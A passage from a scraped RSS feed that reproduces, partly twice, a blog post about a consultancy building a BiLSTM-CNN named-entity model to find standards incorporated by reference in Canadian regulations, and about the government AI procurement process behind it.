references in the </em><a href="https://laws-lois.justice.gc.ca/eng/regulations/sor-86-304/FullText.html"><em>Canada Occupational Health and Safety Regulations</em></a><em>! Hint: Some of them start with “CSA”, but not all!</em></p><h4>The Need for Automation</h4><p>Why was this a machine-learning problem? Logically, one should assume that the list of IBRs was available somewhere. Also, why wouldn’t we be able to simply download the list from a few SDOs and string-match them?</p><p>Well, we tried that. We tried all of that. Very quickly we confirmed the issues that were raised by Justice Canada and various departments. The master lists were more legacy knowledge than systematic recordings and many team members had left with all of the reference locations in their heads.</p><p>Let’s take a standard as an example — <a href="https://www.iso.org/standard/59752.html">ISO 13485</a>. (My first career was in medical devices, so this standard was always top of mind.) The official title of that regulation is <strong>“</strong><a href="https://www.iso.org/standard/59752.html"><strong><em>ISO 13485:2016</em></strong></a><strong><em> Medical devices — Quality management systems — Requirements for regulatory purposes”</em></strong>. The whole thing. With a title this complex, many things can go wrong with string matching. Some issues that we found were:</p><ul><li><strong>Incorrect characters. </strong>Many standards are enumerated with em dashes rather than hyphens in their titles (“⁠ — “ vs “-”).</li><li><strong>Official vs interpreted names. </strong>Sometimes the colon was not in the correct space, and additional characters (spaces and punctuation) were added incorrectly.</li><li><strong>Short names. </strong>After a document has been incorporated with its full name, the shorthand version (e.g., “ISO 13485”).</li><li><strong>Geographic Names.</strong> National SDOs (such as NIST or CSA) re-interpret a standard to be slightly more applicable in the country, so the title changes ever so slightly (with “CAN/CSA” as a prefix).</li></ul><p>Going back to the ISO 13485 example, here is one of the references from the <a href="https://laws.justice.gc.ca/eng/regulations/SOR-98-282/FullText.html">Medical Devices Regulations</a>: “[…] <em>(f) a copy of the quality management system certificate certifying that the quality management system under which the device is manufactured meets the requirements set out in the N</em><strong><em>ational Standard of Canada CAN/CSA-ISO 13485, Medical devices — Quality management systems — Requirements for regulatory purposes</em></strong><em>, as amended from time to time.[…]”</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*HIkB8vHWyCjVDNYzUyqGEA.png"><figcaption>Not the same. This issue multiplies across all standards. Image by author.</figcaption></figure><p>We did find some luck with early string matching to find a few examples and to start building our dataset, but fundamentally it was not going to be a reliable approach, and certainly not one that would provide any level of assurance.</p><p>On top of the difficulties reported by Justice Canada, the language used had some additional issues that required this project to resolve:</p><ul><li><strong>True incorporation vs mere reference.</strong> Just because a document is mentioned does not mean it is legally binding. Therefore, a distinction had to be made regarding how is the document mentioned.</li><li><strong>Static vs ambulatory references.</strong> Is a reference pointing to a specific version of a standard or a document, or is it pointing to the latest version of that document? Could that document be updated without the responsible body knowing?</li><li><strong>Outdated standards.</strong> Is the document still applicable? Is the document still <em>retrievable </em>from the SDO? Can the government fundamentally enforce a regulation if its referenced standards have all been sunset?</li></ul><p>Therefore, a tool that could automate all of this was required.</p><p><em>Sidenote: My favorite incorporation is still from </em><a href="https://laws-lois.justice.gc.ca/eng/regulations/SOR-2002-415/page-1.html"><em>Mushuau Innu First Nation Band Order (SOR/2002–415)</em></a><em>:</em></p><blockquote>In this Order, “adoption” includes adoption in accordance with Innu custom.</blockquote><h3>Defining a New Procurement Process</h3><p>Pushing for government innovation, by any measure, is never a small feat. In this particular case, the timing could not have been worse. Many public reprimands caused departments to not want to be associated with the process, and for the Canada School of Public Service (CSPS, a non-political entity helping to improve government function) to take the burden of responsibility.</p><p>To overcome these challenges, procurement officers led the charge in defining a new procurement process more closely aligned with procurement in the tech sector, where a trough of vendors could be selected on competency, sub-selected for a project on willingness to bid, and then a handful of vendors would be invited to submit a bid. This regulatory innovation list was a prototype for what is now today the AI Supplier List.</p><p>Here are some of the summary factors that led to this list taking place:</p><ul><li>March 2016: The Standing Joint Committee for the Scrutiny of Regulations issues a <a href="http://standing%20joint%20committee%20for%20the%20scrutiny%20of%20regulations/">series of recommendations addressing issues related to the practice of incorporations by reference</a>. Initial efforts are made to address Recommendation 4, “<em>[…] That the Statutory Instruments Act be amended to establish a central repository for incorporated materials and require regulation-making authorities to provide, on an annual basis, a list of all incorporated documents.</em>” This was following a series of lawsuits claiming that any and all documents represented within the regulatory stock should be made available, free of charge. Therefore, there was to identify all available references to evaluate exactly what is the fiscal burden to participate in a given industry.</li><li>Spring 2018: The <strong>vitriolic </strong>Auditor General’s 2018 Report comes out regarding Canada’s largest IT migration project and boy, it was not gentle. <a href="https://www.oag-bvg.gc.ca/internet/English/parl_oag_201805_00_e_43032.html">Citing numerous oversights pertaining to the Phoenix payroll overhaul</a> project, the Auditor General calls it “<a href="https://www.theregister.com/2018/05/29/canada_phoenix_payroll_system_audit/"><strong><em>an incomprehensible failure</em></strong></a>”. Things had to change in the IT procurement process, jeopardizing the initial AI procurement efforts, and the IBR project.</li><li>May 2018: Before jumping into any risky venture, the Treasury Board Secretariat (described in a <a href="https://towardsdatascience.com/understanding-canadas-algorithmic-impact-assessment-tool-cd0d3c8cafab">previous article</a>) decided to invite industry participants to gain better knowledge about what AI could potentially do for navigating the stock of regulations. During the <a href="https://buyandsell.gc.ca/procurement-data/tender-notice/PW-18-00828244">Artificial Intelligence Industry Day</a>, “<em>[…] TBS [was] looking for industry partners and academic researchers to help apply artificial intelligence methods such as advanced data analytics (ADA) and machine learning (ML) to regulations of varying type, scope and complexity.</em>”</li><li>June-Sept 2018: Feeling confident about the state of the art, but worried about another IT procurement fiasco, TBS asks the Canada School of Public Service (as apolitical a government organization as it gets) to lead the procurement process for <a href="https://buyandsell.gc.ca/procurement-data/tender-notice/PW-18-00832114">creating a list of capable AI companies</a>. The total contract size for the winners?<strong><em> $1.00.</em></strong></li><li>Nov 2018: With our consulting partner <a href="https://www.mnp.ca/">MNP</a>, we get invited to bid on <em>CSPS-RFP-18LL-1593: Demonstration Project to Pilot Application of Artificial Intelligence Methods to Regulations that Use Incorporation by Reference, </em>a pre-qualified supplier-only project. All suppliers were selected from the Demo Day qualification process.</li><li>This process, having been successful and our consortium having won it, allowed the government to push ahead with this new vehicle. <em>“PSPC is working with the Canada School of Public Service (CSPS) on the first procurement to use the AI source list. The </em><a href="https://buyandsell.gc.ca/procurement-data/tender-notice/PW-EE-017-34665"><em>solicitation</em></a><em> for the CSPS interactive regulatory evaluation platform was issued on BuyandSell.gc.ca on Feb 28, 2019.” (</em><a href="https://www.tpsgc-pwgsc.gc.ca/app-acq/cral-sarc/iava-aipv-eng.html"><em>source</em></a><em>)</em></li></ul><p>As a prototype for what is now the Federal AI supplier list, the Canada School of Public Service is a prime project owner. This department focuses on the improvement of the public service workforce through training, education, and awareness, and is a refreshingly non-partisan function — everybody likes having a more effective government.</p><h3>The AI Engine</h3><p>Let’s contextualize this project.</p><ul><li>This is an entity recognition problem, but most of the entities were not retrievable from a central list (one of the purposes of this project was actually to generate this list).</li><li>We had to account for many potential OOV issues since we did not want to run the chance of missing a forgotten SDO.</li><li>The actual contract scope was back in 2017, so <a href="https://arxiv.org/abs/1810.04805">BERT</a> wasn’t even published yet. Transformers would have been <em>lovely</em>.</li></ul><p>The approach that we took was based on the Chiu and Nichols (2016) paper entitled <a href="https://arxiv.org/abs/1511.08308"><strong>Named Entity Recognition with Bidirectional LSTM-CNNs</strong></a>. Kudos to my team for trudging through all of the potential NER papers. At the time, this paper had best-in-class scores not only for NER tasks but had shown the highest rates of success with never-before-seen entities, something quite important here.</p><p>Justice Canada made our lives a bit easier by providing the entire stock of Canadian regulations in a machine-readable format. However, there was no training data available and no starting examples of entities, only horror stories of people losing their critical Post-It notes.</p><p>We had weeks of interviews talking to the employees about which standards they were aware of and received a lot of support in identifying the heuristics that could indicate that a reference was present. “<em>… in accordance with X</em>”, “<em>as amended from time to time</em>”, and a few other terms helped us in sifting through regulation after regulation to spot these sightings in the wild.</p><p>We even tried deploying a custom labeling tool, but the results were somehow still very poor. We resorted to collecting the base dataset ourselves by searching through the heuristics provided.</p><h4>Why this model?</h4><p>Why we really liked this paper is that it encodes the same heuristics that a human uses to identify an external reference — especially one that is a code more than a word. The model looks at the following features:</p><ul><li>changes in word sequence patterns;</li><li>changes in character sequences; and</li><li>changes in capitalization.</li></ul><p>From the paper:</p><blockquote>Named entity recognition is a challenging task that has traditionally required large amounts of knowledge in the form of feature engineering and lexicons to achieve high performance. In this paper, we present a novel neural network architecture that automatically detects word- and character-level features using a hybrid bidirectional LSTM and CNN architecture, eliminating the need for most feature engineering.</blockquote><p>The reason we committed to this particular model was because of its strength in identifying never-before-seen entities, especially in the context of third-party standards. Additionally, the exact mechanism for identifying the start and stop of an entity is almost exactly how an individual within Justice Canada would do it: by looking at trigger words, changes in capitalization, and changes in alphanumeric sequences.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*S_48pDlq33H0DgEWgyiETg.png"><figcaption>Image by author.</figcaption></figure><p>Here is an <a href="https://towardsdatascience.com/deep-learning-for-named-entity-recognition-2-implementing-the-state-of-the-art-bidirectional-lstm-4603491087f1">in-depth article</a> about the original paper.</p><p>What was truly innovative about this model was the Frankenstein approach to reusing the prepared features for both an LSTM focusing on words and a CNN focusing on characters. Instead of picking the best approach, you stick everything in a blender and let fate decide.</p><p>Here’s the LSTM side:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/555/1*jb7jjJ7Cr9FLT8IQRVOF5A.png"><figcaption>“[…] The (unrolled) BLSTM for tagging named entities. Multiple tables look up word-level feature vectors. The CNN extracts a fixed-length feature vector from character-level features. For each word, these vectors are concatenated and fed to the BLSTM network and then to the output layers.” (From the <a href="https://arxiv.org/abs/1511.08308">paper</a>.)</figcaption></figure><p>And here’s the CNN side:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/530/1*Kb797_GA3EG8auGqDSQ5Ng.png"><figcaption>“[…] The convolutional neural network extracts character features from each word. The character embedding and (optionally) the character type feature vector are computed through lookup tables. Then, they are concatenated and passed into the CNN.” (From the <a href="https://arxiv.org/abs/1511.08308">paper</a>.)</figcaption></figure><p>for clarity, here’s a walkthrough of the model building code used in the project:</p><a href="https://medium.com/media/82da77440fdc7f5977f69b95f4efb137/href">https://medium.com/media/82da77440fdc7f5977f69b95f4efb137/href</a><p><em>Note: the rest of the code is under some weird licensing conversation with the client, so we’ll open-source it once we know what’s going on. Then again, just use transformers.</em></p><h4>The Results</h4><p>There were two categories of results we focused on:</p><ul><li>The general model performance; and</li><li>The usability of the tool for our client.</li></ul><p>The model results were acceptable given the context.</p><p>The overall F1-score of the model was 0.726 with the raw structure above. (For fun, a basic LSTM on the same dataset had an F1-score of 0.277, so an improvement for sure.)</p><p>Diving deeper into the utility of the model, we looked at 1. whether or not a reference was present (“O”), 2. if we could accurately predict the beginning of a reference (“B-ref”), and 3. can we detect that we are inside a reference (“I-ref”). This meant that we were closer to how an operator would improve their work by being indicated where a reference is present rather than optimizing for the start and stop of the identified segment. These results were much more promising:</p><a href="https://medium.com/media/3fca8d9d8453a11bdc16679592e77857/href">https://medium.com/media/3fca8d9d8453a11bdc16679592e77857/href</a><p><em>Also, for the keen observers stating that some of the false positives were higher: if you look at the resulting model performance, these could be described as true positives in the regulations. For instance, the model will highlight “the Code”, which is in relation to a previous mention of an IBR.</em></p><h3>Navigating the Regulatory Stock</h3><p>After the model pushed through all the regulations, it was then time to display the results somehow to search and identify the results.</p><p>While skipping over the details of accessibility and platform design (we used a Laravel frontend with a Flask backend — it was 2018, after all), we built a simple platform that could ingest the regulatory stock, search for regulations, and identify in context the specific incorporations by reference that existed inside the regulations.</p><p>This frontend was where a lot of requirements started getting clarified and adjusted as the clients saw what the tool could do.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dwUg5svMO2pKZDaen48FFQ.png"><figcaption>A view of the SA/IBR portal, looking at the Regulations search page. Iamge by author.</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ozA0a7Ep9-izROS_fB9SBA.png"><figcaption>A view of the SA/IBR portal, looking at the Medical Device Regulations page. Image by author.</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/771/1*gCMp2omizZNGwc7x8rQi3A.png"><figcaption>A detailed view of the highlighting performed. This is in Section 9 of <strong>SOR-86–304: Canada Occupational Health and Safety Regulations. </strong>Image by author.</figcaption></figure><h3>Validation and Usability</h3><p>As we were closing off many of the features in the contract, we started noticing the limits of the content in the regulatory stock. that certain ancillary features could not be achieved due to insufficient candidate examples in the data. (For example, there was a line item tied to static vs. ambulatory references — usually referred to with a “<em>[…] the latest version of […]</em>” — but our initial search only found 5 examples of ambulatory references. )</p><p>Sometimes, in AI consulting, project delivery requires clarification once the data has been evaluated and the models built. In this case, many conversations were had about the utility of the tool against contract expectations (based on the reality of the data), which allowed us to whittle away at the platform and ensure that the code delivered actually addresses the regulation drafters’ core concerns.</p><p>On validating the core model (catching third-part references), a key question was simply: <em>does it work? </em>That question had many technical sublayers to it (with the <em>beginning</em> and <em>inner </em>metrics listed above), but the key business case was further clarified: <em>Does the tool allow a reviewer to identify *</em><strong><em>all* </em></strong><em>of the third-party references in a regulation?</em></p><p>The Justice Canada team performed multiple reviews of the results. After a few weeks of discussion, they confirmed that <strong>our tool had not missed a single incorporation by reference. </strong>We kept up post-project quality control to ensure no outstanding issues, but our work here was done. ❤️</p><p><strong><em>Disclaimer</em></strong><em>: This article is also about the prototype procurement list that was the precursor to the now-famous AI Supplier List of the Canadian Federal Government. The first </em><strong><em>actual </em></strong><em>project on the Canadian AI Supplier List was won by both </em><a href="https://buyandsell.gc.ca/procurement-data/tender-notice/PW-EE-017-34665"><em>KPMG and Lixar (now BDO)</em></a><em>; in no way are we claiming in this article that we won that particular project, or that we were the first ever AI project within the public function. However, there was a prototype procurement vehicle for the adoption of AI technologies that came out before the AI supplier list where we delivered a very interesting approach. This is the story of that project.</em></p><h3>Other articles you may enjoy</h3><ul><li><a href="https://medium.com/towards-data-science/interpreting-the-business-considerations-of-mlops-f32613c4bcb4">Interpreting the Business Considerations of MLOps</a></li><li><a href="https://towardsdatascience.com/pytorch-vs-tensorflow-for-transformer-based-nlp-applications-b851bdbf229a">PyTorch vs. TensorFlow for Transformer-Based NLP Applications</a></li><li><a href="https://towardsdatascience.com/mlops-for-batch-processing-running-airflow-on-gpus-dc94367869c6">MLOps for Batch Processing: Running Airflow on GPUs</a></li><li><a href="https://towardsdatascience.com/dataset-biases-institutionalized-discrimination-or-adequate-transparency-ae4119e2a65c">Dataset Biases: Institutionalized Discrimination or Adequate Transparency?</a></li><li><a href="https://medium.com/@lsci/how-does-artificial-intelligence-create-value-bec14c785b40">How Does AI Create Value?</a></li><li><a href="https://towardsdatascience.com/implementing-a-corporate-ai-strategy-a64e641384c8">Implementing a Corporate AI Strategy</a></li><li><a href="https://towardsdatascience.com/outlier-aware-clustering-beyond-k-means-76f7bf8b4899">Outlier-Aware Clustering: Beyond K-Means</a></li><li><a href="https://towardsdatascience.com/rorschach-tests-for-deep-learning-image-classifiers-68c019fcc9a9">Rorschach Tests for Deep Learning Image Classifiers</a></li></ul><p><em>If you have additional questions about this article or our AI consulting, feel free to reach out via </em><a href="https://www.linkedin.com/in/mnlemay/"><strong><em>LinkedIn</em></strong></a><strong><em> </em></strong><em>or by </em><a href="mailto:matt@lemay.ai"><strong><em>email</em></strong></a><em>.</em></p><p>-Matt.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=8c67e58c22f0" width="1" height="1" alt=""><hr><p><a href="https://towardsdatascience.com/how-we-won-our-first-government-ai-project-8c67e58c22f0">How We Won Our First Government AI Project</a> was originally published in <a href="https://towardsdatascience.com/">Towards Data Science</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How We Won Our First Government AI Project]]></title>
<description><![CDATA[The Story of Delivering Canada’s Precursor Engagement to the Canadian AI Supplier ListPhoto by Tetyana Kovyrina on pexels.com. Also, a nice view from the Alexandra Bridge when I go cycling.Table of ContentsOverviewKeeping Laws and Regulations Up To DateDefining a New Procurement ProcessThe AI Eng...]]></description>
<link>https://tsecurity.de/de/1866495/ai-nachrichten/how-we-won-our-first-government-ai-project/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1866495/ai-nachrichten/how-we-won-our-first-government-ai-project/</guid>
<pubDate>Fri, 14 Apr 2023 21:49:34 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>The Story of Delivering Canada’s Precursor Engagement to the Canadian AI Supplier List</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kZByYT7jkIqpPas_cat86A.jpeg"><figcaption>Photo by <a href="https://www.pexels.com/photo/photo-of-beige-and-green-castle-1045915/">Tetyana Kovyrina</a> on pexels.com. Also, a nice view from the <a href="https://goo.gl/maps/etXAjFNn4JGyHfKf9">Alexandra Bridge</a> when I go cycling.</figcaption></figure><h3><strong>Table of Contents</strong></h3><ul><li><a href="https://towardsdatascience.com/how-we-won-our-first-government-ai-project-8c67e58c22f0#4ab2">Overview</a></li><li><a href="https://towardsdatascience.com/how-we-won-our-first-government-ai-project-8c67e58c22f0#f0c7">Keeping Laws and Regulations Up To Date</a></li><li><a href="https://towardsdatascience.com/how-we-won-our-first-government-ai-project-8c67e58c22f0#8e9d">Defining a New Procurement Process</a></li><li><a href="https://towardsdatascience.com/how-we-won-our-first-government-ai-project-8c67e58c22f0#415f">The AI Engine</a></li><li><a href="https://towardsdatascience.com/how-we-won-our-first-government-ai-project-8c67e58c22f0#828c">Navigating the Regulatory Stock</a></li></ul><h3>Overview</h3><p>Back in early 2018, we participated in the Canadian Federal Government’s innovative procurement vehicle with a simple goal: to find innovations that will help to modernize all acts and regulations. There were many objectives to this new innovation purchasing vehicle:</p><ul><li>Identify outdated, burdensome, or simply non-applicable laws;</li><li>Compare the laws to other countries and regions around the world to see how domain-specific regulations are applied, such as the health or energy sectors;</li><li>Retrieve third-party references inside the stock of regulations.</li></ul><p>Lucky for us, we won the bid to help modernize Canadian regulations through the use of a custom NLP platform. However, everything that happened leading up to this project ended up affecting the project in some way.</p><p>This is a story of government procurement, AI adoption, and using technology to solve real-world problems.</p><h3>Keeping Laws and Regulations Up To Date</h3><p>Every government has a requirement to ensure that laws are not only equitable to all citizens but also applicable. Philosophers for centuries have argued and debated about the relationship of the individual in a society, and the concept of fairness and equality is generally a main driving force in democratic populations.</p><p>As we’ve seen with government polarization, laws can become really slow to get adopted. Usually, elected officials pass a law to assign a set of responsibilities to an agency or to a department. This responsible body can update the regulations as they see fit for the duration of its mandate.</p><p>No laws are set in stone, but they are assumed to be fairly fixed. With technology, however, innovation typically moves beyond the speed of standard legal processes. Should a government only intervene when technology starts hurting its population? Or should there be a system to react faster to social issues?</p><p>An important tool used by all levels of regulations to remain dynamic is <strong>incorporating a technical reference within a regulation</strong>. This incorporation allows for regulation to stay relevant by deferring to an external source of information, thereby having the power to update a regulation by pointing to a more modern standard.</p><h4>The Mechanics of Incorporating a Document in a Regulation</h4><p>The simple obligation transitivity looks like this:</p><ul><li>an Act will say, ‘follow the Regulation’ and authorize a responsible body (such as a department) to manage and update said Regulation;</li><li>that Regulation will say, ‘apply the Standard’;</li><li>the Standard will then contain all of the prescriptive activities required for the citizens and organizations.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/805/1*0PeguYKsMNsYDFvYCtYhHQ.png"><figcaption>The relationship between laws, regulations, and technical references. Image by author.</figcaption></figure><h4>Incorporations by Reference: a Double-Edged Sword</h4><p>How can regulators specialize and design laws and regulations in every industrial and technological sector? The simple answer is: they can’t. Technical details change too quickly for experts to list all obligations that participants should follow. And so, with the increased availability of quality work from various Standards Definitions Organizations (SDOs) such as the <a href="https://www.iso.org/">International Standards Organization (ISO)</a>, the inclusion of those expert guidelines as a means to reduce the review time and make laws relevant and applicable makes sense.</p><p>The flip side of this process, however, is a fairly nasty one: <strong>the deferral of expertise to external agents may constitute an illegal abdication of democracy. </strong>Simply, non-elected officials are prescribing directives within regulations.</p><p>How does a democracy then maintain agency over its laws if the responsibility of technical oversight is pushed to SDOs? By reviewing, updating, and managing which standards are to be included during every regulatory review.</p><p>What quickly happens, however, is that too many references start appearing in these regulations, and the cognitive burden of reviewing a regulation to find the scattering of references shoots up to thousands of hours per review.</p><p>In fact, the true motivation for this project was the cost of the manual effort. All of these complexities put together meant a tremendous amount of human effort to review and update these regulations. The KPIs that were shared with us: <strong>1,500 person-hours are required for every single review</strong>.</p><p><em>Interested in playing at home? Try to find all references in the </em><a href="https://laws-lois.justice.gc.ca/eng/regulations/sor-86-304/FullText.html"><em>Canada Occupational Health and Safety Regulations</em></a><em>! Hint: Some of them start with “CSA”, but not all!</em></p><h4>The Need for Automation</h4><p>Why was this a machine-learning problem? Logically, one should assume that the list of IBRs was available somewhere. Also, why wouldn’t we be able to simply download the list from a few SDOs and string-match them?</p><p>Well, we tried that. We tried all of that. Very quickly we confirmed the issues that were raised by Justice Canada and various departments. The master lists were more legacy knowledge than systematic recordings and many team members had left with all of the reference locations in their heads.</p><p>Let’s take a standard as an example — <a href="https://www.iso.org/standard/59752.html">ISO 13485</a>. (My first career was in medical devices, so this standard was always top of mind.) The official title of that regulation is <strong>“</strong><a href="https://www.iso.org/standard/59752.html"><strong><em>ISO 13485:2016</em></strong></a><strong><em> Medical devices — Quality management systems — Requirements for regulatory purposes”</em></strong>. The whole thing. With a title this complex, many things can go wrong with string matching. Some issues that we found were:</p><ul><li><strong>Incorrect characters. </strong>Many standards are enumerated with em dashes rather than hyphens in their titles (“⁠ — “ vs “-”).</li><li><strong>Official vs interpreted names. </strong>Sometimes the colon was not in the correct space, and additional characters (spaces and punctuation) were added incorrectly.</li><li><strong>Short names. </strong>After a document has been incorporated with its full name, the shorthand version (e.g., “ISO 13485”).</li><li><strong>Geographic Names.</strong> National SDOs (such as NIST or CSA) re-interpret a standard to be slightly more applicable in the country, so the title changes ever so slightly (with “CAN/CSA” as a prefix).</li></ul><p>Going back to the ISO 13485 example, here is one of the references from the <a href="https://laws.justice.gc.ca/eng/regulations/SOR-98-282/FullText.html">Medical Devices Regulations</a>: “[…] <em>(f) a copy of the quality management system certificate certifying that the quality management system under which the device is manufactured meets the requirements set out in the N</em><strong><em>ational Standard of Canada CAN/CSA-ISO 13485, Medical devices — Quality management systems — Requirements for regulatory purposes</em></strong><em>, as amended from time to time.[…]”</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*HIkB8vHWyCjVDNYzUyqGEA.png"><figcaption>Not the same. This issue multiplies across all standards. Image by author.</figcaption></figure><p>We did find some luck with early string matching to find a few examples and to start building our dataset, but fundamentally it was not going to be a reliable approach, and certainly not one that would provide any level of assurance.</p><p>On top of the difficulties reported by Justice Canada, the language used had some additional issues that required this project to resolve:</p><ul><li><strong>True incorporation vs mere reference.</strong> Just because a document is mentioned does not mean it is legally binding. Therefore, a distinction had to be made regarding how is the document mentioned.</li><li><strong>Static vs ambulatory references.</strong> Is a reference pointing to a specific version of a standard or a document, or is it pointing to the latest version of that document? Could that document be updated without the responsible body knowing?</li><li><strong>Outdated standards.</strong> Is the document still applicable? Is the document still <em>retrievable </em>from the SDO? Can the government fundamentally enforce a regulation if its referenced standards have all been sunset?</li></ul><p>Therefore, a tool that could automate all of this was required.</p><p><em>Sidenote: My favorite incorporation is still from </em><a href="https://laws-lois.justice.gc.ca/eng/regulations/SOR-2002-415/page-1.html"><em>Mushuau Innu First Nation Band Order (SOR/2002–415)</em></a><em>:</em></p><blockquote>In this Order, “adoption” includes adoption in accordance with Innu custom.</blockquote><h3>Defining a New Procurement Process</h3><p>Pushing for government innovation, by any measure, is never a small feat. In this particular case, the timing could not have been worse. Many public reprimands caused departments to not want to be associated with the process, and for the Canada School of Public Service (CSPS, a non-political entity helping to improve government function) to take the burden of responsibility.</p><p>To overcome these challenges, procurement officers led the charge in defining a new procurement process more closely aligned with procurement in the tech sector, where a trough of vendors could be selected on competency, sub-selected for a project on willingness to bid, and then a handful of vendors would be invited to submit a bid. This regulatory innovation list was a prototype for what is now today the AI Supplier List.</p><p>Here are some of the summary factors that led to this list taking place:</p><ul><li>March 2016: The Standing Joint Committee for the Scrutiny of Regulations issues a <a href="http://standing%20joint%20committee%20for%20the%20scrutiny%20of%20regulations/">series of recommendations addressing issues related to the practice of incorporations by reference</a>. Initial efforts are made to address Recommendation 4, “<em>[…] That the Statutory Instruments Act be amended to establish a central repository for incorporated materials and require regulation-making authorities to provide, on an annual basis, a list of all incorporated documents.</em>” This was following a series of lawsuits claiming that any and all documents represented within the regulatory stock should be made available, free of charge. Therefore, there was to identify all available references to evaluate exactly what is the fiscal burden to participate in a given industry.</li><li>Spring 2018: The <strong>vitriolic </strong>Auditor General’s 2018 Report comes out regarding Canada’s largest IT migration project and boy, it was not gentle. <a href="https://www.oag-bvg.gc.ca/internet/English/parl_oag_201805_00_e_43032.html">Citing numerous oversights pertaining to the Phoenix payroll overhaul</a> project, the Auditor General calls it “<a href="https://www.theregister.com/2018/05/29/canada_phoenix_payroll_system_audit/"><strong><em>an incomprehensible failure</em></strong></a>”. Things had to change in the IT procurement process, jeopardizing the initial AI procurement efforts, and the IBR project.</li><li>May 2018: Before jumping into any risky venture, the Treasury Board Secretariat (described in a <a href="https://towardsdatascience.com/understanding-canadas-algorithmic-impact-assessment-tool-cd0d3c8cafab">previous article</a>) decided to invite industry participants to gain better knowledge about what AI could potentially do for navigating the stock of regulations. During the <a href="https://buyandsell.gc.ca/procurement-data/tender-notice/PW-18-00828244">Artificial Intelligence Industry Day</a>, “<em>[…] TBS [was] looking for industry partners and academic researchers to help apply artificial intelligence methods such as advanced data analytics (ADA) and machine learning (ML) to regulations of varying type, scope and complexity.</em>”</li><li>June-Sept 2018: Feeling confident about the state of the art, but worried about another IT procurement fiasco, TBS asks the Canada School of Public Service (as apolitical a government organization as it gets) to lead the procurement process for <a href="https://buyandsell.gc.ca/procurement-data/tender-notice/PW-18-00832114">creating a list of capable AI companies</a>. The total contract size for the winners?<strong><em> $1.00.</em></strong></li><li>Nov 2018: With our consulting partner <a href="https://www.mnp.ca/">MNP</a>, we get invited to bid on <em>CSPS-RFP-18LL-1593: Demonstration Project to Pilot Application of Artificial Intelligence Methods to Regulations that Use Incorporation by Reference, </em>a pre-qualified supplier-only project. All suppliers were selected from the Demo Day qualification process.</li><li>This process, having been successful and our consortium having won it, allowed the government to push ahead with this new vehicle. <em>“PSPC is working with the Canada School of Public Service (CSPS) on the first procurement to use the AI source list. The </em><a href="https://buyandsell.gc.ca/procurement-data/tender-notice/PW-EE-017-34665"><em>solicitation</em></a><em> for the CSPS interactive regulatory evaluation platform was issued on BuyandSell.gc.ca on Feb 28, 2019.” (</em><a href="https://www.tpsgc-pwgsc.gc.ca/app-acq/cral-sarc/iava-aipv-eng.html"><em>source</em></a><em>)</em></li></ul><p>As a prototype for what is now the Federal AI supplier list, the Canada School of Public Service is a prime project owner. This department focuses on the improvement of the public service workforce through training, education, and awareness, and is a refreshingly non-partisan function — everybody likes having a more effective government.</p><h3>The AI Engine</h3><p>Let’s contextualize this project.</p><ul><li>This is an entity recognition problem, but most of the entities were not retrievable from a central list (one of the purposes of this project was actually to generate this list).</li><li>We had to account for many potential OOV issues since we did not want to run the chance of missing a forgotten SDO.</li><li>The actual contract scope was back in 2017, so <a href="https://arxiv.org/abs/1810.04805">BERT</a> wasn’t even published yet. Transformers would have been <em>lovely</em>.</li></ul><p>The approach that we took was based on the Chiu and Nichols (2016) paper entitled <a href="https://arxiv.org/abs/1511.08308"><strong>Named Entity Recognition with Bidirectional LSTM-CNNs</strong></a>. Kudos to my team for trudging through all of the potential NER papers. At the time, this paper had best-in-class scores not only for NER tasks but had shown the highest rates of success with never-before-seen entities, something quite important here.</p><p>Justice Canada made our lives a bit easier by providing the entire stock of Canadian regulations in a machine-readable format. However, there was no training data available and no starting examples of entities, only horror stories of people losing their critical Post-It notes.</p><p>We had weeks of interviews talking to the employees about which standards they were aware of and received a lot of support in identifying the heuristics that could indicate that a reference was present. “<em>… in accordance with X</em>”, “<em>as amended from time to time</em>”, and a few other terms helped us in sifting through regulation after regulation to spot these sightings in the wild.</p><p>We even tried deploying a custom labeling tool, but the results were somehow still very poor. We resorted to collecting the base dataset ourselves by searching through the heuristics provided.</p><h4>Why this model?</h4><p>Why we really liked this paper is that it encodes the same heuristics that a human uses to identify an external reference — especially one that is a code more than a word. The model looks at the following features:</p><ul><li>changes in word sequence patterns;</li><li>changes in character sequences; and</li><li>changes in capitalization.</li></ul><p>From the paper:</p><blockquote>Named entity recognition is a challenging task that has traditionally required large amounts of knowledge in the form of feature engineering and lexicons to achieve high performance. In this paper, we present a novel neural network architecture that automatically detects word- and character-level features using a hybrid bidirectional LSTM and CNN architecture, eliminating the need for most feature engineering.</blockquote><p>The reason we committed to this particular model was because of its strength in identifying never-before-seen entities, especially in the context of third-party standards. Additionally, the exact mechanism for identifying the start and stop of an entity is almost exactly how an individual within Justice Canada would do it: by looking at trigger words, changes in capitalization, and changes in alphanumeric sequences.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*S_48pDlq33H0DgEWgyiETg.png"><figcaption>Image by author.</figcaption></figure><p>Here is an <a href="https://towardsdatascience.com/deep-learning-for-named-entity-recognition-2-implementing-the-state-of-the-art-bidirectional-lstm-4603491087f1">in-depth article</a> about the original paper.</p><p>What was truly innovative about this model was the Frankenstein approach to reusing the prepared features for both an LSTM focusing on words and a CNN focusing on characters. Instead of picking the best approach, you stick everything in a blender and let fate decide.</p><p>Here’s the LSTM side:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/555/1*jb7jjJ7Cr9FLT8IQRVOF5A.png"><figcaption>“[…] The (unrolled) BLSTM for tagging named entities. Multiple tables look up word-level feature vectors. The CNN extracts a fixed-length feature 